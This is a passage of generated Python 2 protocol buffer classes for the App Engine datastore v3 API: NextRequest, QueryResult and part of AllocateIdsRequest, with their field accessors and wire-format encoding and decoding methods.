    if self.has_offset_ and self.offset_ != x.offset_: return 0
    if self.has_compile_ != x.has_compile_: return 0
    if self.has_compile_ and self.compile_ != x.compile_: return 0
    return 1

  def IsInitialized(self, debug_strs=None):
    # `cursor` is required; report it when missing, else recurse into it.
    initialized = 1
    if (self.has_header_ and not self.header_.IsInitialized(debug_strs)): initialized = 0
    if (not self.has_cursor_):
      initialized = 0
      if debug_strs is not None:
        debug_strs.append('Required field: cursor not set.')
    elif not self.cursor_.IsInitialized(debug_strs): initialized = 0
    return initialized

  def ByteSize(self):
    n = 0
    if (self.has_header_): n += 1 + self.lengthString(self.header_.ByteSize())
    n += self.lengthString(self.cursor_.ByteSize())
    if (self.has_count_): n += 1 + self.lengthVarInt64(self.count_)
    if (self.has_offset_): n += 1 + self.lengthVarInt64(self.offset_)
    if (self.has_compile_): n += 2
    # +1 is the tag byte for the required `cursor` field, always written.
    return n + 1

  def ByteSizePartial(self):
    # Partial size: required `cursor` contributes only if actually set.
    n = 0
    if (self.has_header_): n += 1 + self.lengthString(self.header_.ByteSizePartial())
    if (self.has_cursor_):
      n += 1
      n += self.lengthString(self.cursor_.ByteSizePartial())
    if (self.has_count_): n += 1 + self.lengthVarInt64(self.count_)
    if (self.has_offset_): n += 1 + self.lengthVarInt64(self.offset_)
    if (self.has_compile_): n += 2
    return n

  def Clear(self):
    self.clear_header()
    self.clear_cursor()
    self.clear_count()
    self.clear_offset()
    self.clear_compile()

  def OutputUnchecked(self, out):
    # Required `cursor` (tag 10) is written unconditionally; optional
    # fields follow with tags 16, 24, 32, 42.
    out.putVarInt32(10)
    out.putVarInt32(self.cursor_.ByteSize())
    self.cursor_.OutputUnchecked(out)
    if (self.has_count_):
      out.putVarInt32(16)
      out.putVarInt32(self.count_)
    if (self.has_compile_):
      out.putVarInt32(24)
      out.putBoolean(self.compile_)
    if (self.has_offset_):
      out.putVarInt32(32)
      out.putVarInt32(self.offset_)
    if (self.has_header_):
      out.putVarInt32(42)
      out.putVarInt32(self.header_.ByteSize())
      self.header_.OutputUnchecked(out)

  def OutputPartial(self, out):
    # Like OutputUnchecked, but `cursor` is skipped when unset.
    if (self.has_cursor_):
      out.putVarInt32(10)
      out.putVarInt32(self.cursor_.ByteSizePartial())
      self.cursor_.OutputPartial(out)
    if (self.has_count_):
      out.putVarInt32(16)
      out.putVarInt32(self.count_)
    if (self.has_compile_):
      out.putVarInt32(24)
      out.putBoolean(self.compile_)
    if (self.has_offset_):
      out.putVarInt32(32)
      out.putVarInt32(self.offset_)
    if (self.has_header_):
      out.putVarInt32(42)
      out.putVarInt32(self.header_.ByteSizePartial())
      self.header_.OutputPartial(out)

  def TryMerge(self, d):
    # Decode from Decoder `d`; unknown tags skipped, tag 0 is malformed.
    while d.avail() > 0:
      tt = d.getVarInt32()
      if tt == 10:
        length = d.getVarInt32()
        tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
        d.skip(length)
        self.mutable_cursor().TryMerge(tmp)
        continue
      if tt == 16:
        self.set_count(d.getVarInt32())
        continue
      if tt == 24:
        self.set_compile(d.getBoolean())
        continue
      if tt == 32:
        self.set_offset(d.getVarInt32())
        continue
      if tt == 42:
        length = d.getVarInt32()
        tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
        d.skip(length)
        self.mutable_header().TryMerge(tmp)
        continue


      if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
      d.skipData(tt)


  def __str__(self, prefix="", printElemNumber=0):
    # Human-readable debug text; nested messages indent by two spaces.
    res=""
    if self.has_header_:
      res+=prefix+"header <\n"
      res+=self.header_.__str__(prefix + "  ", printElemNumber)
      res+=prefix+">\n"
    if self.has_cursor_:
      res+=prefix+"cursor <\n"
      res+=self.cursor_.__str__(prefix + "  ", printElemNumber)
      res+=prefix+">\n"
    if self.has_count_: res+=prefix+("count: %s\n" % self.DebugFormatInt32(self.count_))
    if self.has_offset_: res+=prefix+("offset: %s\n" % self.DebugFormatInt32(self.offset_))
    if self.has_compile_: res+=prefix+("compile: %s\n" % self.DebugFormatBool(self.compile_))
    return res


  # Expand a sparse {tag: value} dict into a dense tuple (class-body helper).
  def _BuildTagLookupTable(sparse, maxtag, default=None):
    return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])

  # Field-number constants.
  kheader = 5
  kcursor = 1
  kcount = 2
  koffset = 4
  kcompile = 3

  # Tag number -> field name, for debug formatting.
  _TEXT = _BuildTagLookupTable({
    0: "ErrorCode",
    1: "cursor",
    2: "count",
    3: "compile",
    4: "offset",
    5: "header",
  }, 5)

  # Tag number -> wire type.
  _TYPES = _BuildTagLookupTable({
    0: ProtocolBuffer.Encoder.NUMERIC,
    1: ProtocolBuffer.Encoder.STRING,
    2: ProtocolBuffer.Encoder.NUMERIC,
    3: ProtocolBuffer.Encoder.NUMERIC,
    4: ProtocolBuffer.Encoder.NUMERIC,
    5: ProtocolBuffer.Encoder.STRING,
  }, 5, ProtocolBuffer.Encoder.MAX_TYPE)


  _STYLE = """"""
  _STYLE_CONTENT_TYPE = """"""
  _PROTO_DESCRIPTOR_NAME = 'apphosting_datastore_v3.NextRequest'
class QueryResult(ProtocolBuffer.ProtocolMessage):
  """Generated message class for apphosting_datastore_v3.QueryResult.

  Fields (tag numbers in parentheses):
    cursor (1), result (2, repeated EntityProto), more_results (3, required
    bool), keys_only (4), compiled_query (5), compiled_cursor (6),
    skipped_results (7), index (8, repeated CompositeIndex), index_only (9),
    small_ops (10), version (11, repeated int64), result_compiled_cursor
    (12, repeated CompiledCursor), skipped_results_compiled_cursor (13).

  Optional submessages are lazily constructed under lazy_init_lock_.
  Do not edit by hand: tag numbers and byte-size arithmetic encode the
  wire format exactly.
  """
  # Class-level defaults; overwritten per-instance on first set.
  has_cursor_ = 0
  cursor_ = None
  has_skipped_results_ = 0
  skipped_results_ = 0
  has_more_results_ = 0
  more_results_ = 0
  has_keys_only_ = 0
  keys_only_ = 0
  has_index_only_ = 0
  index_only_ = 0
  has_small_ops_ = 0
  small_ops_ = 0
  has_compiled_query_ = 0
  compiled_query_ = None
  has_compiled_cursor_ = 0
  compiled_cursor_ = None
  has_skipped_results_compiled_cursor_ = 0
  skipped_results_compiled_cursor_ = None

  def __init__(self, contents=None):
    # Repeated fields live on the instance; optional submessages stay lazy.
    self.result_ = []
    self.index_ = []
    self.version_ = []
    self.result_compiled_cursor_ = []
    self.lazy_init_lock_ = thread.allocate_lock()
    if contents is not None: self.MergeFromString(contents)

  def cursor(self):
    # Double-checked lazy init under lazy_init_lock_.
    if self.cursor_ is None:
      self.lazy_init_lock_.acquire()
      try:
        if self.cursor_ is None: self.cursor_ = Cursor()
      finally:
        self.lazy_init_lock_.release()
    return self.cursor_

  def mutable_cursor(self): self.has_cursor_ = 1; return self.cursor()

  def clear_cursor(self):

    if self.has_cursor_:
      self.has_cursor_ = 0;
      if self.cursor_ is not None: self.cursor_.Clear()

  def has_cursor(self): return self.has_cursor_

  def result_size(self): return len(self.result_)
  def result_list(self): return self.result_

  def result(self, i):
    return self.result_[i]

  def mutable_result(self, i):
    return self.result_[i]

  def add_result(self):
    # Append and return a fresh EntityProto for in-place population.
    x = EntityProto()
    self.result_.append(x)
    return x

  def clear_result(self):
    self.result_ = []
  def skipped_results(self): return self.skipped_results_

  def set_skipped_results(self, x):
    self.has_skipped_results_ = 1
    self.skipped_results_ = x

  def clear_skipped_results(self):
    if self.has_skipped_results_:
      self.has_skipped_results_ = 0
      self.skipped_results_ = 0

  def has_skipped_results(self): return self.has_skipped_results_

  def more_results(self): return self.more_results_

  def set_more_results(self, x):
    self.has_more_results_ = 1
    self.more_results_ = x

  def clear_more_results(self):
    if self.has_more_results_:
      self.has_more_results_ = 0
      self.more_results_ = 0

  def has_more_results(self): return self.has_more_results_

  def keys_only(self): return self.keys_only_

  def set_keys_only(self, x):
    self.has_keys_only_ = 1
    self.keys_only_ = x

  def clear_keys_only(self):
    if self.has_keys_only_:
      self.has_keys_only_ = 0
      self.keys_only_ = 0

  def has_keys_only(self): return self.has_keys_only_

  def index_only(self): return self.index_only_

  def set_index_only(self, x):
    self.has_index_only_ = 1
    self.index_only_ = x

  def clear_index_only(self):
    if self.has_index_only_:
      self.has_index_only_ = 0
      self.index_only_ = 0

  def has_index_only(self): return self.has_index_only_

  def small_ops(self): return self.small_ops_

  def set_small_ops(self, x):
    self.has_small_ops_ = 1
    self.small_ops_ = x

  def clear_small_ops(self):
    if self.has_small_ops_:
      self.has_small_ops_ = 0
      self.small_ops_ = 0

  def has_small_ops(self): return self.has_small_ops_

  def compiled_query(self):
    # Double-checked lazy init under lazy_init_lock_.
    if self.compiled_query_ is None:
      self.lazy_init_lock_.acquire()
      try:
        if self.compiled_query_ is None: self.compiled_query_ = CompiledQuery()
      finally:
        self.lazy_init_lock_.release()
    return self.compiled_query_

  def mutable_compiled_query(self): self.has_compiled_query_ = 1; return self.compiled_query()

  def clear_compiled_query(self):

    if self.has_compiled_query_:
      self.has_compiled_query_ = 0;
      if self.compiled_query_ is not None: self.compiled_query_.Clear()

  def has_compiled_query(self): return self.has_compiled_query_

  def compiled_cursor(self):
    # Double-checked lazy init under lazy_init_lock_.
    if self.compiled_cursor_ is None:
      self.lazy_init_lock_.acquire()
      try:
        if self.compiled_cursor_ is None: self.compiled_cursor_ = CompiledCursor()
      finally:
        self.lazy_init_lock_.release()
    return self.compiled_cursor_

  def mutable_compiled_cursor(self): self.has_compiled_cursor_ = 1; return self.compiled_cursor()

  def clear_compiled_cursor(self):

    if self.has_compiled_cursor_:
      self.has_compiled_cursor_ = 0;
      if self.compiled_cursor_ is not None: self.compiled_cursor_.Clear()

  def has_compiled_cursor(self): return self.has_compiled_cursor_

  def index_size(self): return len(self.index_)
  def index_list(self): return self.index_

  def index(self, i):
    return self.index_[i]

  def mutable_index(self, i):
    return self.index_[i]

  def add_index(self):
    # Append and return a fresh CompositeIndex for in-place population.
    x = CompositeIndex()
    self.index_.append(x)
    return x

  def clear_index(self):
    self.index_ = []
  def version_size(self): return len(self.version_)
  def version_list(self): return self.version_

  def version(self, i):
    return self.version_[i]

  def set_version(self, i, x):
    self.version_[i] = x

  def add_version(self, x):
    self.version_.append(x)

  def clear_version(self):
    self.version_ = []

  def result_compiled_cursor_size(self): return len(self.result_compiled_cursor_)
  def result_compiled_cursor_list(self): return self.result_compiled_cursor_

  def result_compiled_cursor(self, i):
    return self.result_compiled_cursor_[i]

  def mutable_result_compiled_cursor(self, i):
    return self.result_compiled_cursor_[i]

  def add_result_compiled_cursor(self):
    # Append and return a fresh CompiledCursor for in-place population.
    x = CompiledCursor()
    self.result_compiled_cursor_.append(x)
    return x

  def clear_result_compiled_cursor(self):
    self.result_compiled_cursor_ = []
  def skipped_results_compiled_cursor(self):
    # Double-checked lazy init under lazy_init_lock_.
    if self.skipped_results_compiled_cursor_ is None:
      self.lazy_init_lock_.acquire()
      try:
        if self.skipped_results_compiled_cursor_ is None: self.skipped_results_compiled_cursor_ = CompiledCursor()
      finally:
        self.lazy_init_lock_.release()
    return self.skipped_results_compiled_cursor_

  def mutable_skipped_results_compiled_cursor(self): self.has_skipped_results_compiled_cursor_ = 1; return self.skipped_results_compiled_cursor()

  def clear_skipped_results_compiled_cursor(self):

    if self.has_skipped_results_compiled_cursor_:
      self.has_skipped_results_compiled_cursor_ = 0;
      if self.skipped_results_compiled_cursor_ is not None: self.skipped_results_compiled_cursor_.Clear()

  def has_skipped_results_compiled_cursor(self): return self.has_skipped_results_compiled_cursor_


  def MergeFrom(self, x):
    # Merge all set/repeated fields from another QueryResult; repeated
    # message fields deep-copy each element.
    assert x is not self
    if (x.has_cursor()): self.mutable_cursor().MergeFrom(x.cursor())
    for i in xrange(x.result_size()): self.add_result().CopyFrom(x.result(i))
    if (x.has_skipped_results()): self.set_skipped_results(x.skipped_results())
    if (x.has_more_results()): self.set_more_results(x.more_results())
    if (x.has_keys_only()): self.set_keys_only(x.keys_only())
    if (x.has_index_only()): self.set_index_only(x.index_only())
    if (x.has_small_ops()): self.set_small_ops(x.small_ops())
    if (x.has_compiled_query()): self.mutable_compiled_query().MergeFrom(x.compiled_query())
    if (x.has_compiled_cursor()): self.mutable_compiled_cursor().MergeFrom(x.compiled_cursor())
    for i in xrange(x.index_size()): self.add_index().CopyFrom(x.index(i))
    for i in xrange(x.version_size()): self.add_version(x.version(i))
    for i in xrange(x.result_compiled_cursor_size()): self.add_result_compiled_cursor().CopyFrom(x.result_compiled_cursor(i))
    if (x.has_skipped_results_compiled_cursor()): self.mutable_skipped_results_compiled_cursor().MergeFrom(x.skipped_results_compiled_cursor())

  def Equals(self, x):
    # Field-by-field equality; returns 1/0 (generated-code convention).
    if x is self: return 1
    if self.has_cursor_ != x.has_cursor_: return 0
    if self.has_cursor_ and self.cursor_ != x.cursor_: return 0
    if len(self.result_) != len(x.result_): return 0
    for e1, e2 in zip(self.result_, x.result_):
      if e1 != e2: return 0
    if self.has_skipped_results_ != x.has_skipped_results_: return 0
    if self.has_skipped_results_ and self.skipped_results_ != x.skipped_results_: return 0
    if self.has_more_results_ != x.has_more_results_: return 0
    if self.has_more_results_ and self.more_results_ != x.more_results_: return 0
    if self.has_keys_only_ != x.has_keys_only_: return 0
    if self.has_keys_only_ and self.keys_only_ != x.keys_only_: return 0
    if self.has_index_only_ != x.has_index_only_: return 0
    if self.has_index_only_ and self.index_only_ != x.index_only_: return 0
    if self.has_small_ops_ != x.has_small_ops_: return 0
    if self.has_small_ops_ and self.small_ops_ != x.small_ops_: return 0
    if self.has_compiled_query_ != x.has_compiled_query_: return 0
    if self.has_compiled_query_ and self.compiled_query_ != x.compiled_query_: return 0
    if self.has_compiled_cursor_ != x.has_compiled_cursor_: return 0
    if self.has_compiled_cursor_ and self.compiled_cursor_ != x.compiled_cursor_: return 0
    if len(self.index_) != len(x.index_): return 0
    for e1, e2 in zip(self.index_, x.index_):
      if e1 != e2: return 0
    if len(self.version_) != len(x.version_): return 0
    for e1, e2 in zip(self.version_, x.version_):
      if e1 != e2: return 0
    if len(self.result_compiled_cursor_) != len(x.result_compiled_cursor_): return 0
    for e1, e2 in zip(self.result_compiled_cursor_, x.result_compiled_cursor_):
      if e1 != e2: return 0
    if self.has_skipped_results_compiled_cursor_ != x.has_skipped_results_compiled_cursor_: return 0
    if self.has_skipped_results_compiled_cursor_ and self.skipped_results_compiled_cursor_ != x.skipped_results_compiled_cursor_: return 0
    return 1

  def IsInitialized(self, debug_strs=None):
    # `more_results` is required; all set submessages are checked recursively.
    initialized = 1
    if (self.has_cursor_ and not self.cursor_.IsInitialized(debug_strs)): initialized = 0
    for p in self.result_:
      if not p.IsInitialized(debug_strs): initialized=0
    if (not self.has_more_results_):
      initialized = 0
      if debug_strs is not None:
        debug_strs.append('Required field: more_results not set.')
    if (self.has_compiled_query_ and not self.compiled_query_.IsInitialized(debug_strs)): initialized = 0
    if (self.has_compiled_cursor_ and not self.compiled_cursor_.IsInitialized(debug_strs)): initialized = 0
    for p in self.index_:
      if not p.IsInitialized(debug_strs): initialized=0
    for p in self.result_compiled_cursor_:
      if not p.IsInitialized(debug_strs): initialized=0
    if (self.has_skipped_results_compiled_cursor_ and not self.skipped_results_compiled_cursor_.IsInitialized(debug_strs)): initialized = 0
    return initialized

  def ByteSize(self):
    n = 0
    if (self.has_cursor_): n += 1 + self.lengthString(self.cursor_.ByteSize())
    n += 1 * len(self.result_)
    for i in xrange(len(self.result_)): n += self.lengthString(self.result_[i].ByteSize())
    if (self.has_skipped_results_): n += 1 + self.lengthVarInt64(self.skipped_results_)
    if (self.has_keys_only_): n += 2
    if (self.has_index_only_): n += 2
    if (self.has_small_ops_): n += 2
    if (self.has_compiled_query_): n += 1 + self.lengthString(self.compiled_query_.ByteSize())
    if (self.has_compiled_cursor_): n += 1 + self.lengthString(self.compiled_cursor_.ByteSize())
    n += 1 * len(self.index_)
    for i in xrange(len(self.index_)): n += self.lengthString(self.index_[i].ByteSize())
    n += 1 * len(self.version_)
    for i in xrange(len(self.version_)): n += self.lengthVarInt64(self.version_[i])
    n += 1 * len(self.result_compiled_cursor_)
    for i in xrange(len(self.result_compiled_cursor_)): n += self.lengthString(self.result_compiled_cursor_[i].ByteSize())
    if (self.has_skipped_results_compiled_cursor_): n += 1 + self.lengthString(self.skipped_results_compiled_cursor_.ByteSize())
    # +2 is the tag byte plus bool byte for required `more_results`,
    # always written by OutputUnchecked.
    return n + 2

  def ByteSizePartial(self):
    # Partial size: required `more_results` contributes only if set.
    n = 0
    if (self.has_cursor_): n += 1 + self.lengthString(self.cursor_.ByteSizePartial())
    n += 1 * len(self.result_)
    for i in xrange(len(self.result_)): n += self.lengthString(self.result_[i].ByteSizePartial())
    if (self.has_skipped_results_): n += 1 + self.lengthVarInt64(self.skipped_results_)
    if (self.has_more_results_):
      n += 2
    if (self.has_keys_only_): n += 2
    if (self.has_index_only_): n += 2
    if (self.has_small_ops_): n += 2
    if (self.has_compiled_query_): n += 1 + self.lengthString(self.compiled_query_.ByteSizePartial())
    if (self.has_compiled_cursor_): n += 1 + self.lengthString(self.compiled_cursor_.ByteSizePartial())
    n += 1 * len(self.index_)
    for i in xrange(len(self.index_)): n += self.lengthString(self.index_[i].ByteSizePartial())
    n += 1 * len(self.version_)
    for i in xrange(len(self.version_)): n += self.lengthVarInt64(self.version_[i])
    n += 1 * len(self.result_compiled_cursor_)
    for i in xrange(len(self.result_compiled_cursor_)): n += self.lengthString(self.result_compiled_cursor_[i].ByteSizePartial())
    if (self.has_skipped_results_compiled_cursor_): n += 1 + self.lengthString(self.skipped_results_compiled_cursor_.ByteSizePartial())
    return n

  def Clear(self):
    self.clear_cursor()
    self.clear_result()
    self.clear_skipped_results()
    self.clear_more_results()
    self.clear_keys_only()
    self.clear_index_only()
    self.clear_small_ops()
    self.clear_compiled_query()
    self.clear_compiled_cursor()
    self.clear_index()
    self.clear_version()
    self.clear_result_compiled_cursor()
    self.clear_skipped_results_compiled_cursor()

  def OutputUnchecked(self, out):
    # Required `more_results` (tag 24) is written unconditionally; all
    # other fields are guarded by their presence flags.
    if (self.has_cursor_):
      out.putVarInt32(10)
      out.putVarInt32(self.cursor_.ByteSize())
      self.cursor_.OutputUnchecked(out)
    for i in xrange(len(self.result_)):
      out.putVarInt32(18)
      out.putVarInt32(self.result_[i].ByteSize())
      self.result_[i].OutputUnchecked(out)
    out.putVarInt32(24)
    out.putBoolean(self.more_results_)
    if (self.has_keys_only_):
      out.putVarInt32(32)
      out.putBoolean(self.keys_only_)
    if (self.has_compiled_query_):
      out.putVarInt32(42)
      out.putVarInt32(self.compiled_query_.ByteSize())
      self.compiled_query_.OutputUnchecked(out)
    if (self.has_compiled_cursor_):
      out.putVarInt32(50)
      out.putVarInt32(self.compiled_cursor_.ByteSize())
      self.compiled_cursor_.OutputUnchecked(out)
    if (self.has_skipped_results_):
      out.putVarInt32(56)
      out.putVarInt32(self.skipped_results_)
    for i in xrange(len(self.index_)):
      out.putVarInt32(66)
      out.putVarInt32(self.index_[i].ByteSize())
      self.index_[i].OutputUnchecked(out)
    if (self.has_index_only_):
      out.putVarInt32(72)
      out.putBoolean(self.index_only_)
    if (self.has_small_ops_):
      out.putVarInt32(80)
      out.putBoolean(self.small_ops_)
    for i in xrange(len(self.version_)):
      out.putVarInt32(88)
      out.putVarInt64(self.version_[i])
    for i in xrange(len(self.result_compiled_cursor_)):
      out.putVarInt32(98)
      out.putVarInt32(self.result_compiled_cursor_[i].ByteSize())
      self.result_compiled_cursor_[i].OutputUnchecked(out)
    if (self.has_skipped_results_compiled_cursor_):
      out.putVarInt32(106)
      out.putVarInt32(self.skipped_results_compiled_cursor_.ByteSize())
      self.skipped_results_compiled_cursor_.OutputUnchecked(out)

  def OutputPartial(self, out):
    # Like OutputUnchecked, but `more_results` is skipped when unset and
    # partial submessage sizes are used.
    if (self.has_cursor_):
      out.putVarInt32(10)
      out.putVarInt32(self.cursor_.ByteSizePartial())
      self.cursor_.OutputPartial(out)
    for i in xrange(len(self.result_)):
      out.putVarInt32(18)
      out.putVarInt32(self.result_[i].ByteSizePartial())
      self.result_[i].OutputPartial(out)
    if (self.has_more_results_):
      out.putVarInt32(24)
      out.putBoolean(self.more_results_)
    if (self.has_keys_only_):
      out.putVarInt32(32)
      out.putBoolean(self.keys_only_)
    if (self.has_compiled_query_):
      out.putVarInt32(42)
      out.putVarInt32(self.compiled_query_.ByteSizePartial())
      self.compiled_query_.OutputPartial(out)
    if (self.has_compiled_cursor_):
      out.putVarInt32(50)
      out.putVarInt32(self.compiled_cursor_.ByteSizePartial())
      self.compiled_cursor_.OutputPartial(out)
    if (self.has_skipped_results_):
      out.putVarInt32(56)
      out.putVarInt32(self.skipped_results_)
    for i in xrange(len(self.index_)):
      out.putVarInt32(66)
      out.putVarInt32(self.index_[i].ByteSizePartial())
      self.index_[i].OutputPartial(out)
    if (self.has_index_only_):
      out.putVarInt32(72)
      out.putBoolean(self.index_only_)
    if (self.has_small_ops_):
      out.putVarInt32(80)
      out.putBoolean(self.small_ops_)
    for i in xrange(len(self.version_)):
      out.putVarInt32(88)
      out.putVarInt64(self.version_[i])
    for i in xrange(len(self.result_compiled_cursor_)):
      out.putVarInt32(98)
      out.putVarInt32(self.result_compiled_cursor_[i].ByteSizePartial())
      self.result_compiled_cursor_[i].OutputPartial(out)
    if (self.has_skipped_results_compiled_cursor_):
      out.putVarInt32(106)
      out.putVarInt32(self.skipped_results_compiled_cursor_.ByteSizePartial())
      self.skipped_results_compiled_cursor_.OutputPartial(out)

  def TryMerge(self, d):
    # Decode from Decoder `d`, dispatching on wire tag; unknown tags are
    # skipped, tag 0 is malformed input.
    while d.avail() > 0:
      tt = d.getVarInt32()
      if tt == 10:
        length = d.getVarInt32()
        tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
        d.skip(length)
        self.mutable_cursor().TryMerge(tmp)
        continue
      if tt == 18:
        length = d.getVarInt32()
        tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
        d.skip(length)
        self.add_result().TryMerge(tmp)
        continue
      if tt == 24:
        self.set_more_results(d.getBoolean())
        continue
      if tt == 32:
        self.set_keys_only(d.getBoolean())
        continue
      if tt == 42:
        length = d.getVarInt32()
        tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
        d.skip(length)
        self.mutable_compiled_query().TryMerge(tmp)
        continue
      if tt == 50:
        length = d.getVarInt32()
        tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
        d.skip(length)
        self.mutable_compiled_cursor().TryMerge(tmp)
        continue
      if tt == 56:
        self.set_skipped_results(d.getVarInt32())
        continue
      if tt == 66:
        length = d.getVarInt32()
        tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
        d.skip(length)
        self.add_index().TryMerge(tmp)
        continue
      if tt == 72:
        self.set_index_only(d.getBoolean())
        continue
      if tt == 80:
        self.set_small_ops(d.getBoolean())
        continue
      if tt == 88:
        self.add_version(d.getVarInt64())
        continue
      if tt == 98:
        length = d.getVarInt32()
        tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
        d.skip(length)
        self.add_result_compiled_cursor().TryMerge(tmp)
        continue
      if tt == 106:
        length = d.getVarInt32()
        tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
        d.skip(length)
        self.mutable_skipped_results_compiled_cursor().TryMerge(tmp)
        continue


      if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
      d.skipData(tt)


  def __str__(self, prefix="", printElemNumber=0):
    # Human-readable debug text; nested messages indent by two spaces.
    res=""
    if self.has_cursor_:
      res+=prefix+"cursor <\n"
      res+=self.cursor_.__str__(prefix + "  ", printElemNumber)
      res+=prefix+">\n"
    cnt=0
    for e in self.result_:
      elm=""
      if printElemNumber: elm="(%d)" % cnt
      res+=prefix+("result%s <\n" % elm)
      res+=e.__str__(prefix + "  ", printElemNumber)
      res+=prefix+">\n"
      cnt+=1
    if self.has_skipped_results_: res+=prefix+("skipped_results: %s\n" % self.DebugFormatInt32(self.skipped_results_))
    if self.has_more_results_: res+=prefix+("more_results: %s\n" % self.DebugFormatBool(self.more_results_))
    if self.has_keys_only_: res+=prefix+("keys_only: %s\n" % self.DebugFormatBool(self.keys_only_))
    if self.has_index_only_: res+=prefix+("index_only: %s\n" % self.DebugFormatBool(self.index_only_))
    if self.has_small_ops_: res+=prefix+("small_ops: %s\n" % self.DebugFormatBool(self.small_ops_))
    if self.has_compiled_query_:
      res+=prefix+"compiled_query <\n"
      res+=self.compiled_query_.__str__(prefix + "  ", printElemNumber)
      res+=prefix+">\n"
    if self.has_compiled_cursor_:
      res+=prefix+"compiled_cursor <\n"
      res+=self.compiled_cursor_.__str__(prefix + "  ", printElemNumber)
      res+=prefix+">\n"
    cnt=0
    for e in self.index_:
      elm=""
      if printElemNumber: elm="(%d)" % cnt
      res+=prefix+("index%s <\n" % elm)
      res+=e.__str__(prefix + "  ", printElemNumber)
      res+=prefix+">\n"
      cnt+=1
    cnt=0
    for e in self.version_:
      elm=""
      if printElemNumber: elm="(%d)" % cnt
      res+=prefix+("version%s: %s\n" % (elm, self.DebugFormatInt64(e)))
      cnt+=1
    cnt=0
    for e in self.result_compiled_cursor_:
      elm=""
      if printElemNumber: elm="(%d)" % cnt
      res+=prefix+("result_compiled_cursor%s <\n" % elm)
      res+=e.__str__(prefix + "  ", printElemNumber)
      res+=prefix+">\n"
      cnt+=1
    if self.has_skipped_results_compiled_cursor_:
      res+=prefix+"skipped_results_compiled_cursor <\n"
      res+=self.skipped_results_compiled_cursor_.__str__(prefix + "  ", printElemNumber)
      res+=prefix+">\n"
    return res


  # Expand a sparse {tag: value} dict into a dense tuple (class-body helper).
  def _BuildTagLookupTable(sparse, maxtag, default=None):
    return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])

  # Field-number constants.
  kcursor = 1
  kresult = 2
  kskipped_results = 7
  kmore_results = 3
  kkeys_only = 4
  kindex_only = 9
  ksmall_ops = 10
  kcompiled_query = 5
  kcompiled_cursor = 6
  kindex = 8
  kversion = 11
  kresult_compiled_cursor = 12
  kskipped_results_compiled_cursor = 13

  # Tag number -> field name, for debug formatting.
  _TEXT = _BuildTagLookupTable({
    0: "ErrorCode",
    1: "cursor",
    2: "result",
    3: "more_results",
    4: "keys_only",
    5: "compiled_query",
    6: "compiled_cursor",
    7: "skipped_results",
    8: "index",
    9: "index_only",
    10: "small_ops",
    11: "version",
    12: "result_compiled_cursor",
    13: "skipped_results_compiled_cursor",
  }, 13)

  # Tag number -> wire type.
  _TYPES = _BuildTagLookupTable({
    0: ProtocolBuffer.Encoder.NUMERIC,
    1: ProtocolBuffer.Encoder.STRING,
    2: ProtocolBuffer.Encoder.STRING,
    3: ProtocolBuffer.Encoder.NUMERIC,
    4: ProtocolBuffer.Encoder.NUMERIC,
    5: ProtocolBuffer.Encoder.STRING,
    6: ProtocolBuffer.Encoder.STRING,
    7: ProtocolBuffer.Encoder.NUMERIC,
    8: ProtocolBuffer.Encoder.STRING,
    9: ProtocolBuffer.Encoder.NUMERIC,
    10: ProtocolBuffer.Encoder.NUMERIC,
    11: ProtocolBuffer.Encoder.NUMERIC,
    12: ProtocolBuffer.Encoder.STRING,
    13: ProtocolBuffer.Encoder.STRING,
  }, 13, ProtocolBuffer.Encoder.MAX_TYPE)


  _STYLE = """"""
  _STYLE_CONTENT_TYPE = """"""
  _PROTO_DESCRIPTOR_NAME = 'apphosting_datastore_v3.QueryResult'
class AllocateIdsRequest(ProtocolBuffer.ProtocolMessage):
  """Request message for the datastore v3 AllocateIds RPC.

  Fields (wire tags are the k* constants near the bottom):
    model_key (1) -- optional Reference sub-message, lazily constructed.
    size      (2) -- optional varint.
    max       (3) -- optional varint.
    header    (4) -- optional InternalHeader sub-message, lazily constructed.
    reserve   (5) -- repeated Reference sub-message.
    trusted   (6) -- optional bool.
  """
  # Class-level presence flags and scalar defaults.  Message-typed fields
  # start as None and are created on first access under lazy_init_lock_.
  has_header_ = 0
  header_ = None
  has_model_key_ = 0
  model_key_ = None
  has_size_ = 0
  size_ = 0
  has_max_ = 0
  max_ = 0
  has_trusted_ = 0
  trusted_ = 0

  def __init__(self, contents=None):
    # contents, when given, is a serialized message to merge into self.
    self.reserve_ = []
    self.lazy_init_lock_ = thread.allocate_lock()
    if contents is not None: self.MergeFromString(contents)

  def header(self):
    # Double-checked lazy construction of the sub-message.
    if self.header_ is None:
      self.lazy_init_lock_.acquire()
      try:
        if self.header_ is None: self.header_ = InternalHeader()
      finally:
        self.lazy_init_lock_.release()
    return self.header_

  def mutable_header(self): self.has_header_ = 1; return self.header()

  def clear_header(self):
    # Clears the sub-message in place rather than discarding the instance.
    if self.has_header_:
      self.has_header_ = 0;
      if self.header_ is not None: self.header_.Clear()

  def has_header(self): return self.has_header_

  def model_key(self):
    # Double-checked lazy construction of the sub-message.
    if self.model_key_ is None:
      self.lazy_init_lock_.acquire()
      try:
        if self.model_key_ is None: self.model_key_ = Reference()
      finally:
        self.lazy_init_lock_.release()
    return self.model_key_

  def mutable_model_key(self): self.has_model_key_ = 1; return self.model_key()

  def clear_model_key(self):

    if self.has_model_key_:
      self.has_model_key_ = 0;
      if self.model_key_ is not None: self.model_key_.Clear()

  def has_model_key(self): return self.has_model_key_

  def size(self): return self.size_

  def set_size(self, x):
    self.has_size_ = 1
    self.size_ = x

  def clear_size(self):
    if self.has_size_:
      self.has_size_ = 0
      self.size_ = 0

  def has_size(self): return self.has_size_

  def max(self): return self.max_

  def set_max(self, x):
    self.has_max_ = 1
    self.max_ = x

  def clear_max(self):
